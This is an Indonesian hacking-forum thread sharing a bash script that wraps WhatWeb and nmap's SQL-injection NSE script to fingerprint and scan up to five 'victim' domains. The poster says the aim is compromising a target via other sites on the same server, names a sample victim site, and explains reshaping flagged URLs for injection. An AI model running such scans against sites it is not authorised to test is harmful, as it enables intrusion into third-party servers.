SQLi Scanner Bash (sh)
#1
Assalamualaikum wr.wb
berawal dari tadi malem pas ane mau owned target yg menurut ane sudah tidak ada vulner, tetapi dia masih hostingan.
yasudah di scan lah domain2 yang satu server dengan domain target ane. karna rencana ane mau nge jumping.

tapiii bnyak banget domain di server itu, dan gk memungkinkan untuk mengscan satu2 dengan mengetik command nya. yaudah w buat aja bash sederhana ini, ada 2 step yaitu information gathering , lalu meng scan bug atau vulner SQLi (sql injection).

dengan tools ini kita bisa menginput 5 victim sekaligus dalam satu kali scan. nanti akan diberitahu dia pake CMS apa, lalu apakah domain yang kita scan itu merespons langsung (200) atau hanya di-redirect (301).

oke deh langsung saja silahkan save dengan nama apaja.sh

Code:
#!/bin/bash

#this is opensource

#email : [email protected]

##################################################
#color
##################################################
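# ANSI SGR colour escapes, kept as literal backslash sequences; they are
# interpreted only when printed later in the script.
# lightgreen previously carried the same code as lightblue (1;34), so the
# "green" slot rendered blue; bright green is 1;32.
lightgreen='\e[1;32m'
lightblue='\e[1;34m'
blue='\e[0;34m'
lightcyan='\e[1;36m'
yellow='\e[1;33m'
red='\e[1;31m'
purple='\e[0;35m'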
##################################################
#source
##################################################

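    clear
{
# Interactive front end around two external tools:
#   1. WhatWeb  - fingerprints each host that was entered.
#   2. nmap with the sql-injection NSE script - its output is searched for
#      the "sqlspider" probe marker.
# Exactly five prompts are shown; a slot may be left empty.
# The colour variables used below are assigned at the top of the script.
echo "
..######...#######..##.......####.....######...######.....###....##....##
.##....##.##.....##.##........##.....##....##.##....##...##.##...###...##
.##.......##.....##.##........##.....##.......##........##...##..####..##
..######..##.....##.##........##......######..##.......##.....##.##.##.##
.......##.##..##.##.##........##...........##.##.......#########.##..####
.##....##.##....##..##........##.....##....##.##....##.##.....##.##...###
..######...#####.##.########.####.....######...######..##.....##.##....##"
echo ""
echo "This tools can help you to know about your target."
echo "work at two steps: Information Gathering & Vulnerability Assesment (only SQLi)"
echo "and you can input a target to this tools up to 5."
echo "now! lets do it!."
echo "[C] Copyright by KoecroeT."
echo "########################################################"
echo ""
echo "You can input domain what u want to scan : ... "
echo "before that, please follow the rules!"
echo "Please input without http://"
echo "example: "
echo "http://victim.com <<< [that's wrong]"
echo "victim.com <<< [that's right]"

separator="=============================================================="
# One colour per target slot, in the order the prompts appear.
slot_colors=("$yellow" "$lightcyan" "$lightgreen" "$lightblue" "$purple")

# Succeeds only for a bare host name or IP address.
# The value is passed to whatweb and nmap as a command-line argument, so an
# empty string, a leading "-" (which either tool would parse as an option),
# whitespace, glob characters and URL schemes are all refused here.
# The previous test, [ -d $website ], only caught empty input by accident and
# also refused any name that happened to exist as a directory.
is_valid_target() {
  [[ $1 =~ ^[A-Za-z0-9][A-Za-z0-9.-]*$ ]]
}

# --- collect the five targets -------------------------------------------
echo "$separator"
websites=()
for slot in 0 1 2 3 4; do
  echo ""
  printf '%b %s' "${slot_colors[slot]}" "target $((slot + 1)) : "
  # -r keeps backslashes literal; read still trims surrounding whitespace.
  read -r entry
  websites+=("$entry")
  echo ""
  echo "$separator"
done

# --- step 1: information gathering (WhatWeb) ----------------------------
for slot in 0 1 2 3 4; do
  site=${websites[slot]}
  # %s prints the typed value verbatim; only the colour code goes through %b.
  printf '%b %s\n' "${slot_colors[slot]}" "Information Gathering of $site ..."
  if is_valid_target "$site"; then
    # Subshell so the cd does not change the working directory for the
    # rest of the script.
    (cd /pentest/enumeration/web/whatweb/ && ./whatweb "$site")
  else
    echo "Please Input your target"
  fi
  echo ""
  echo "$separator"
done
echo ""

# --- step 2: SQLi check (nmap NSE) --------------------------------------
# A hit means the NSE script listed at least one URL whose response to its
# "' OR sqlspider" probe looked like a database error. That is a heuristic
# and needs manual confirmation. No hit only means the script reported
# nothing for the pages it crawled; it is not proof that the site is free
# of SQL injection.
for slot in 0 1 2 3 4; do
  site=${websites[slot]}
  if ((slot > 0)); then
    echo "$separator"
  fi
  printf '%b %s\n' "${slot_colors[slot]}" "Vulnerability Assesment of SQLi from $site ..."
  printf '%b \n' "${slot_colors[slot]}"
  if ! is_valid_target "$site"; then
    # Empty or malformed slot: do not start nmap without a usable target.
    echo "Please Input your target"
  elif ! scan_output=$(nmap --script=sql-injection "$site"); then
    # nmap missing or failed: report that instead of "Not Vulnerable".
    echo "nmap did not run successfully; no SQLi result for $site" >&2
  elif grep sqlspider <<<"$scan_output"; then
    echo "Founded SQLi Vulnerability"
  else
    echo "Not Vulnerable SQLi"
  fi
  echo ""
done

# Restore the terminal's default colours before returning to the prompt.
printf '%b' '\e[0m'
}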

buat testing aja nih contoh victim: percikschool.com

sperti biasa please kalo mau edit2 jangan apus atau tinggalin nama authornya. biar anda gk dibilang plagiat

jika hasil bug sqli muncul seperti ini, maka kita harus memodif nya terlebih dahulu

Code:
/content.php?id=11'%20OR%20sqlspider&page=berita&act=showdetail
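ingat, `'%20OR%20sqlspider` itu penanda yang ditambahkan nmap ke parameter yang dites (di sini `id`), bukan bagian dari URL aslinya. jadi penanda itu dibuang, tanda "&" dipindahkan ke paling belakang, lalu parameter yang ada setelah tulisan sqlspider (`page=berita&act=showdetail`) di-copy ke depan, tepat setelah tanda tanya. maka yang benar akan tertulis seperti ini: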
Code:
/content.php?page=berita&act=showdetail&id=11


################## FIX ################################# FIX ####################

berhubung ini thread ngangkat lagi hehe, ane kasih perbaikan untuk nmap versi terbarunya ya. yang berubah cuma nama script NSE-nya: `sql-injection` jadi `http-sql-injection`.
Code:
#!/bin/bash

#this is opensource

#email : [email protected]

##################################################
#color
##################################################
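# ANSI SGR colour escapes, kept as literal backslash sequences; they are
# interpreted only when printed later in the script.
# lightgreen previously carried the same code as lightblue (1;34), so the
# "green" slot rendered blue; bright green is 1;32.
lightgreen='\e[1;32m'
lightblue='\e[1;34m'
blue='\e[0;34m'
lightcyan='\e[1;36m'
yellow='\e[1;33m'
red='\e[1;31m'
purple='\e[0;35m'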
##################################################
#source
##################################################

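    clear
{
# Interactive front end around two external tools:
#   1. WhatWeb  - fingerprints each host that was entered.
#   2. nmap with the http-sql-injection NSE script (the script name used by
#      current nmap releases) - its output is searched for the "sqlspider"
#      probe marker.
# Exactly five prompts are shown; a slot may be left empty.
# The colour variables used below are assigned at the top of the script.
echo "
..######...#######..##.......####.....######...######.....###....##....##
.##....##.##.....##.##........##.....##....##.##....##...##.##...###...##
.##.......##.....##.##........##.....##.......##........##...##..####..##
..######..##.....##.##........##......######..##.......##.....##.##.##.##
.......##.##..##.##.##........##...........##.##.......#########.##..####
.##....##.##....##..##........##.....##....##.##....##.##.....##.##...###
..######...#####.##.########.####.....######...######..##.....##.##....##"
echo ""
echo "This tools can help you to know about your target."
echo "work at two steps: Information Gathering & Vulnerability Assesment (only SQLi)"
echo "and you can input a target to this tools up to 5."
echo "now! lets do it!."
echo "[C] Copyright by KoecroeT."
echo "########################################################"
echo ""
echo "You can input domain what u want to scan : ... "
echo "before that, please follow the rules!"
echo "Please input without http://"
echo "example: "
echo "http://victim.com <<< [that's wrong]"
echo "victim.com <<< [that's right]"

separator="=============================================================="
# One colour per target slot, in the order the prompts appear.
slot_colors=("$yellow" "$lightcyan" "$lightgreen" "$lightblue" "$purple")

# Succeeds only for a bare host name or IP address.
# The value is passed to whatweb and nmap as a command-line argument, so an
# empty string, a leading "-" (which either tool would parse as an option),
# whitespace, glob characters and URL schemes are all refused here.
# The previous test, [ -d $website ], only caught empty input by accident and
# also refused any name that happened to exist as a directory.
is_valid_target() {
  [[ $1 =~ ^[A-Za-z0-9][A-Za-z0-9.-]*$ ]]
}

# --- collect the five targets -------------------------------------------
echo "$separator"
websites=()
for slot in 0 1 2 3 4; do
  echo ""
  printf '%b %s' "${slot_colors[slot]}" "target $((slot + 1)) : "
  # -r keeps backslashes literal; read still trims surrounding whitespace.
  read -r entry
  websites+=("$entry")
  echo ""
  echo "$separator"
done

# --- step 1: information gathering (WhatWeb) ----------------------------
for slot in 0 1 2 3 4; do
  site=${websites[slot]}
  # %s prints the typed value verbatim; only the colour code goes through %b.
  printf '%b %s\n' "${slot_colors[slot]}" "Information Gathering of $site ..."
  if is_valid_target "$site"; then
    # Subshell so the cd does not change the working directory for the
    # rest of the script.
    (cd /pentest/enumeration/web/whatweb/ && ./whatweb "$site")
  else
    echo "Please Input your target"
  fi
  echo ""
  echo "$separator"
done
echo ""

# --- step 2: SQLi check (nmap NSE) --------------------------------------
# A hit means the NSE script listed at least one URL whose response to its
# "' OR sqlspider" probe looked like a database error. That is a heuristic
# and needs manual confirmation. No hit only means the script reported
# nothing for the pages it crawled; it is not proof that the site is free
# of SQL injection.
for slot in 0 1 2 3 4; do
  site=${websites[slot]}
  if ((slot > 0)); then
    echo "$separator"
  fi
  printf '%b %s\n' "${slot_colors[slot]}" "Vulnerability Assesment of SQLi from $site ..."
  printf '%b \n' "${slot_colors[slot]}"
  if ! is_valid_target "$site"; then
    # Empty or malformed slot: do not start nmap without a usable target.
    echo "Please Input your target"
  elif ! scan_output=$(nmap --script=http-sql-injection "$site"); then
    # nmap missing or failed: report that instead of "Not Vulnerable".
    echo "nmap did not run successfully; no SQLi result for $site" >&2
  elif grep sqlspider <<<"$scan_output"; then
    echo "Founded SQLi Vulnerability"
  else
    echo "Not Vulnerable SQLi"
  fi
  echo ""
done

# Restore the terminal's default colours before returning to the prompt.
printf '%b' '\e[0m'
}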

thanks before 17-agustus-2013
[shcode=This_site_xss-ed]

#2
comot dulu PERTAMAXX Confused
Every Second, Every Minutes, Every Hours, Every Days Its Never End

#3
wuiih tambah jago aja nih momod yg satu ini Big Grin
+2 dari ane bro karena buat sndiri Smile

#4
keren nih
ijin sedot ya om Big Grin
<< back|track'ers newbee

#5
nice share om...

ijin dicoba

^_^

#6
nah ketemu juga idnya wkwkwk Tongue
Every Second, Every Minutes, Every Hours, Every Days Its Never End

#7
yang ginian ne y ane tunggu2 heheheh , ijin pake om, Smile
aceh.indonesianbacktrack.or.id


#8
Hasil Penggabungan Whatweb sama Nmap . . Big Grin

Nice sharing Big Grin
pengguna baru Imoet

#9
ijin nyedoooot aaah Smile eh tapi cara pake nya bijimana???? Angry
Talent does what it can, genius does what it must.

#10
(05-23-2012, 10:37 PM)zasad Wrote: ijin nyedoooot aaah Smile eh tapi cara pake nya bijimana???? Angry

tinggal input target aja kok om terus enter deh Big Grin
[shcode=This_site_xss-ed]





